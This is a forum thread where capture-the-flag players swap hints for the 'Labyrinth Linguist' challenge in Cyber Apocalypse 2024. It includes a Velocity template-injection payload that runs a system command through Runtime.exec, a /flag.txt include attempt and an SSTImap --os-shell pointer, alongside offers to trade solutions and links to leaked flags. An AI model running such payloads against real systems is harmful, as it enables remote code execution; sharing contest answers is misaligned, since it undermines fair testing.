Mar 13, 2024, 08:46 PM
|
Cyber Apocalypse 2024
by Bendelladj1 - Saturday March 9, 2024 at 02:05 PM
|
|
Mar 13, 2024, 08:51 PM
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids
Mar 13, 2024, 09:04 PM
(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing I do not have them unfortunately I am new here, please help
Mar 13, 2024, 09:15 PM
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing Read part related to RCE https://antgarsil.github.io/posts/velocity/
Mar 13, 2024, 09:15 PM
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing https://github.com/vladko312/sstimap --os-shell will get you there
Mar 13, 2024, 09:30 PM
(Mar 13, 2024, 09:15 PM)xemyll Wrote:(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote: SSTI in velocity template is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end ?
Mar 13, 2024, 09:32 PM
(Mar 13, 2024, 09:30 PM)kenadamsiu Wrote:(Mar 13, 2024, 09:15 PM)xemyll Wrote:(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote: ${#include("/flag.txt")}... I did this but got error what I need to do specifically? play a bit with .exec("whoami")
Mar 13, 2024, 09:34 PM
Looking for writeup for apexsurvive or percetron. Have basically everything else except ~10 challenges. DM me
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,575 |
1 hour ago Last Post: popoler |
||
| [FREE] CPTS 12 FLAGS | 66 | 1,816 |
8 hours ago Last Post: vlka |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 370 | 92,659 |
Yesterday, 05:05 PM Last Post: lifolifo007 |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,230 |
Yesterday, 02:10 PM Last Post: kkkato |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 422 |
Apr 29, 2026, 10:36 PM Last Post: op334 |
|